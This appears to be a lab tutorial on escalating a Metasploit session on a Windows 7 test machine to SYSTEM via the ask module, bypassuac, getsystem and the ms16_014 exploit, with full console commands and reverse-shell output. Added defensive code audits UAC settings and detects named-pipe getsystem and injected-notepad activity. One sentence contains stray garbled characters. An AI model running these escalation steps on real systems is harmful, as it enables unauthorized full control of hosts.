In the previous article, running msf.exe on the Win7 machine gave Kali a session, but that session only had ordinary user privileges and could not do much more.
Privilege escalation
1. Raise the program's run level
2. Bypass UAC
3. Escalate through a privilege-escalation vulnerability
Raising the program's run level
msf module > exploit/windows/local/ask
This triggers a UAC prompt; higher privileges are obtained only if the user clicks Yes.
5 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)
msf5 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(multi/handler) > use exploit/windows/local/ask
msf5 exploit(windows/local/ask) > info
Name: Windows Escalate UAC Execute RunAs
Module: exploit/windows/local/ask
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-01-03
Provided by:
mubix <mubix@hak5.org>
b00stfr3ak
Available targets:
Id Name
-- ----
0 Windows
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME QQ.exe no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 1 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload information:
Description:
This module will attempt to elevate execution level using the
ShellExecute undocumented RunAs flag to bypass low UAC settings.
msf5 exploit(windows/local/ask) >
Session 5 only has ordinary privileges, so the ask module is used to escalate. The module needs the session to escalate from and the name of the program that will be launched.
msf5 exploit(windows/local/ask) > set session 5
session => 5
msf5 exploit(windows/local/ask) > set filename execl.exe
filename => execl.exe
msf5 exploit(windows/local/ask) >
ask模塊設(shè)置完成后,就可以使用了挪挤,運行exploit叼丑,回到win7,可以看見彈出一個execl.exe程序框扛门,如果你點擊是鸠信,則kali會獲得一個新的session,如果點擊否论寨,則kali會得到失敗信息星立。
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
Win7 screenshot:
Win7 clicks No; Kali returns:
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ask) >
Win7 clicks Yes; Kali gets a new session:
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 6 opened (192.168.159.149:4444 -> 192.168.159.145:49249) at 2020-07-10 15:30:43 +0800
meterpreter >
Use background to leave this meterpreter
Use sessions to list the sessions
Use sessions -i 6 to enter the newly obtained session
Use getuid to check that session's privileges
It is still an ordinary user
Now use getsystem to obtain SYSTEM privileges
Then check again with getuid
msf5 exploit(windows/local/ask) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)
6 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49249 (192.168.159.145)
msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
UAC bypass
msf modules
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
The first module is used here to bypass UAC and escalate
msf5 > use exploit/windows/local/bypassuac
Use the bypassuac module
msf5 exploit(windows/local/bypassuac) > set session 5
session => 5
Set the session to escalate
msf5 exploit(windows/local/bypassuac) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 7 opened (192.168.159.149:4444 -> 192.168.159.145:49250) at 2020-07-10 16:00:14 +0800
A new session is obtained
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Escalation successful
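The bypassuac output above decides whether to continue from the UAC level it reads from the registry ("UAC is set to Default", "BypassUAC can bypass this setting"), and the ask module earlier likewise starts by "checking level". The following added example, which is not from the original post or from Metasploit, evaluates the same three registry values from the auditor's side and states which configurations leave a prompt-free elevation path open to a user who is already in the Administrators group. The value names and the meaning of each ConsentPromptBehaviorAdmin level are Microsoft's documented UAC settings; the function names (evaluate_uac, read_live_uac) and the UacFinding fields are my own.

```python
"""Audit the UAC policy values that the UAC-related modules on this page check.

Added example, not from the original post or from Metasploit. The registry
value names and level meanings are Microsoft's documented UAC settings under
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System; the
function and field names are assumptions of this example.
"""
from dataclasses import dataclass
from typing import Optional

UAC_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Documented values of ConsentPromptBehaviorAdmin.
ADMIN_PROMPT_LEVELS = {
    0: "Elevate without prompting",
    1: "Prompt for credentials on the secure desktop",
    2: "Prompt for consent on the secure desktop (Always notify)",
    3: "Prompt for credentials",
    4: "Prompt for consent",
    5: "Prompt for consent for non-Windows binaries (Default)",
}


@dataclass
class UacFinding:
    uac_enabled: bool
    level_name: str
    secure_desktop: bool
    # True when an Administrators-group user can obtain a high-integrity token
    # without any prompt: UAC off, level 0, or level 5 (auto-elevating Windows
    # binaries, the path the bypassuac modules on the page rely on).
    silent_elevation_possible: bool
    recommendation: str


def evaluate_uac(enable_lua: int, consent_prompt_admin: int,
                 prompt_on_secure_desktop: int) -> UacFinding:
    """Classify one UAC configuration given the three raw registry values."""
    if enable_lua == 0:
        return UacFinding(False, "UAC disabled", False, True,
                          "Set EnableLUA=1; with UAC off every process of an "
                          "admin user already runs with the full token.")
    level_name = ADMIN_PROMPT_LEVELS.get(
        consent_prompt_admin, f"unknown ({consent_prompt_admin})")
    secure = prompt_on_secure_desktop == 1
    silent = consent_prompt_admin in (0, 5)
    if silent:
        rec = ("Set ConsentPromptBehaviorAdmin=2 (Always notify) and "
               "PromptOnSecureDesktop=1 so every elevation, including "
               "auto-elevating Windows binaries, requires consent.")
    elif not secure:
        rec = ("Set PromptOnSecureDesktop=1 so the consent dialog cannot be "
               "overlaid or driven by other user-mode programs.")
    else:
        rec = ("Strictest level already; keep it and review elevation prompts "
               "users report that they did not expect.")
    return UacFinding(True, level_name, secure, silent, rec)


def read_live_uac() -> Optional[UacFinding]:
    """Read the values from the local registry; None when not running on Windows."""
    try:
        import winreg  # Windows-only module
    except ImportError:
        return None
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UAC_KEY) as key:
        def val(name: str, default: int) -> int:
            try:
                return int(winreg.QueryValueEx(key, name)[0])
            except FileNotFoundError:
                return default  # value absent means Windows uses its default
        return evaluate_uac(val("EnableLUA", 1),
                            val("ConsentPromptBehaviorAdmin", 5),
                            val("PromptOnSecureDesktop", 1))


if __name__ == "__main__":
    # Off Windows, fall back to the "Default" configuration the page's output shows.
    print(read_live_uac() or evaluate_uac(1, 5, 1))
```

Levels 1 to 4 prompt for every elevation, which is exactly the case in which the bypassuac module on the page reports that it cannot continue; level 5 is the out-of-the-box setting that lets it proceed.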
Escalating through a privilege-escalation vulnerability
exploit/windows/local/ms14_058_track_popup_menu
and so on
Here the module
exploit/windows/local/ms16_014_wmi_recv_notif
is used. As before, info and show options display its details; it only needs a session to be set.
On success it returns a shell directly; use whoami to check the privileges.
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > show options
Module options (exploit/windows/local/ms16_014_wmi_recv_notif):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows 7 SP0/SP1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 8
session => 8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
8 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49251 (192.168.159.145)
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] Launching notepad to host the exploit...
[+] Process 1820 launched.
[*] Reflectively injecting the exploit DLL into 1820...
[*] Injecting exploit into 1820...
[*] Exploit injected. Injecting payload into 1820...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 9 opened (192.168.159.149:4444 -> 192.168.159.145:49255) at 2020-07-10 16:29:00 +0800
C:\Users\win7\Desktop>whoami
whoami
nt authority\system
C:\Users\win7\Desktop>
Escalation successful
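From the defender's side, the two escalation steps shown on this page leave host-level traces. getsystem's technique 1 (used on sessions 6 and 7 above, "Named Pipe Impersonation (In Memory/Admin)") installs a short-lived service whose command echoes into a named pipe, which is the pattern public detection rules key on; the ms16_014 module hosts its payload in notepad.exe ("Launching notepad to host the exploit"), after which notepad connects back to the handler and hands over a command shell. The following added example, which is not from the original post or from Metasploit, runs those checks over a handful of constructed event records shaped like the fields a SIEM extracts from System Event 7045 (service installation) and from Sysmon process-create and network-connect events. The event records, service names and addresses are made up for the example, and the function names (detect, basename) are mine.

```python
"""Host-side detection of the escalation steps shown on this page.

Added example, not from the original post or from Metasploit. SAMPLE_EVENTS
is constructed by hand (not captured telemetry) with field names chosen for
this example; a real pipeline would map 7045 and Sysmon fields onto them.
"""
import re

# ImagePath used by the named-pipe impersonation technique: a one-liner of
# the form  cmd.exe /c echo <random> > \\.\pipe\<random>
PIPE_SERVICE_RE = re.compile(
    r"(cmd(\.exe)?|%COMSPEC%).*?/c\s+echo\b.*?\\\\\.\\pipe\\", re.IGNORECASE)

# Binaries that have no business opening sockets or spawning shells.
NO_NETWORK_HOSTS = {"notepad.exe", "calc.exe", "mspaint.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed records: the first three mirror the page's sequence, the last
# two are benign noise that the rules must leave alone.
SAMPLE_EVENTS = [
    {"type": "service_install", "event_id": 7045, "service_name": "gZqXpLwk",
     "image_path": r"cmd.exe /c echo gzqxp > \\.\pipe\gzqxp"},
    {"type": "network_connect", "image": r"C:\Windows\System32\notepad.exe",
     "pid": 1820, "dest_ip": "192.0.2.10", "dest_port": 4444},
    {"type": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\notepad.exe", "parent_pid": 1820},
    {"type": "network_connect", "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "pid": 2200, "dest_ip": "198.51.100.7", "dest_port": 443},
    {"type": "service_install", "event_id": 7045, "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_id, description) pairs for every event that matches a rule."""
    alerts = []
    for ev in events:
        kind = ev.get("type")
        if kind == "service_install" and PIPE_SERVICE_RE.search(ev.get("image_path", "")):
            alerts.append(("getsystem_named_pipe",
                           f"service {ev['service_name']!r} installed with pipe-echo "
                           f"command: {ev['image_path']}"))
        elif kind == "network_connect" and basename(ev.get("image", "")) in NO_NETWORK_HOSTS:
            alerts.append(("injected_host_network",
                           f"{basename(ev['image'])} pid {ev['pid']} connected to "
                           f"{ev['dest_ip']}:{ev['dest_port']}"))
        elif (kind == "process_create"
              and basename(ev.get("image", "")) in SHELLS
              and basename(ev.get("parent_image", "")) in NO_NETWORK_HOSTS):
            alerts.append(("shell_from_injected_host",
                           f"{basename(ev['parent_image'])} pid {ev['parent_pid']} "
                           f"spawned {basename(ev['image'])}"))
    return alerts


if __name__ == "__main__":
    for rule, text in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {text}")
```

The service-install rule fires on the command shape rather than on the random service name, since the name changes on every run; the notepad rules are deliberately narrow (a fixed list of host binaries) so that they stay quiet on ordinary workstation traffic.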